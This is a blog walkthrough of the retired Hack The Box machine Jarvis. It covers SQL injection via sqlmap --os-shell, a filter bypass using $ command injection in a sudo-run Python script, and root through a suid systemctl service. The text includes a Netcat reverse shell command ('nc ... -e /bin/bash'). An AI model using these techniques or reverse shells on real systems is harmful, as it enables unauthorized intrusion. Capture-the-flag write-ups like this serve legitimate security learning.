Hack The Box – Jarvis Writeup By Nikhil Sahoo
Back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Jarvis which was a Linux machine that retired very recently and was assigned the medium difficulty level.
So without further ado let’s begin…
We’ll start with our recon by doing a Nmap scan.
nmap -sC -sV 10.10.10.143
As we can see that port 80 is open so let’s check that first in our browser.
Nothing exciting. Let’s check it’s source code
So there’s a link with parameter cod=1 and obviously the first thing that should come to our mind is to test for SQL Injection.
Now let’s try placing a single quote after the parameter to check if it’s throwing an error.
So we didn’t get any error but we can surely guess that an SQL Injection vulnerability might be present as we got a different response on breaking the query by placing the single quote.
Now we’ll place this URL in our sqlmap in order to exploit this vulnerability. We’ll try with the –os-shell option as well to check if we can get a shell.
So we’ll be getting our shell but this won’t be a stable one let’s convert it to a stable shell by opening a listener using Netcat in our local system and using python reverse shell in our sqlmap to convert it to a more pretty and stable shell.
But we still won’t be able to get our user flag. Lets type in Sudo -l to check what all commands our current user could run with Sudo privileges.
Seems like there’s some file named simpler.py inside /var/www/Admin-Utilities/ and our user could run this python file as the user “pepper“.
So let’s try to run that file first by typing in: sudo -u pepper ./simpler.py
As per the available options, it looks like it could ping an IP, list the attacker’s IP, etc.
Let’s see the code to get a little more insight.
In general, a remote code execution would have been achieved by simply placing a semicolon or any other operator and appending it with our own command but it is checking for all those special characters in the command by matching it with the values of the forbidden array. However, the “$” operator is not being filtered so let’s use it to place our own code after that.
Now since all the special characters are forbidden it’s really difficult to come up with any reverse shell but we can place our reverse shell in a bash file and can simply execute it to get our shell.
So create a new bash file and place a Netcat command to get a reverse connection:
nc <your ip> <your port> -e /bin/bash
Now move to the /tmp/ directory and download this file from our local machine(using either apache or python SimpleHTTPServer). Next, we will also have to give it executable permission.
Once everything is done open a Netcat listener and after that run that simpler.py file by giving -p option in order to ping an IP address.
Next, it will ask to enter an IP address, simply type in any invalid IP and place a dollar character after that to perform inline execution of an injected command within the original command. It would be something like this:
Now we should be getting our shell as pepper and we will also be able to access our user flag now.
Let’s start hunting for our root flag.
We’ll start by searching for everything that has suid bit set.
But in reality, the more common approach would be to run good enumeration scripts like Linenum or Linux Priv Checker to see all the possible attack vectors but unfortunately, I didn’t take a screenshot of running those scripts.
Moving on as we can see from the above picture that systemctl has suid bit set and would be run as root, so what we can do is we can create our own service which would obviously contain our reverse shell and once it is enabled we should be getting our root shell.
You should bookmark and refer to this amazing link here which shows how to do a privilege escalation using systemctl.
So first things first, let’s create a service.
For the reverse shell, I used the same python command that I had used earlier. Refer to this link for good reverse shells.
Next, download that service file to the target box and give executable permission.
Open a Netcat listener for reverse connection.
Simply run now: “systemctl enable /<path to the service file> –now” and we should be getting our reverse shell as root.
Thus we got our root flag and the challenge was successfully completed.
So that’s for now. See you next time. Goodbye
You can have a look at my previous article on Hack The Box: Haystack Writeup. Here is the link of the article
Loved what you read?
If so, then kindly comment, follow and share our website for much more interesting stuff
For any queries you can send a Hi to my Linkedin Handle: Here